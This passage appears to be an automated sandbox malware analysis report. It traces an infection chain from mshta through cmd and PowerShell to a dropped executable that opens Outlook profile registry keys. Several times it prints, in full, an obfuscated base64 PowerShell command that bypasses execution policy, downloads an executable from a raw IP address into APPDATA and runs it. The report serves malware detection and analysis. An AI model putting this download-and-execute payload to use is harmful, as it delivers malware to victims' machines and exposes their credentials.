Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.pdb source: powershell.exe, 00000003.00000002.1399001221.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: csso.exe, 00000006.00000003.1393345540.0000000003610000.00000004.00001000.00020000.00000000.sdmp, csso.exe, 00000006.00000003.1378138360.0000000003470000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Suspicious command line found
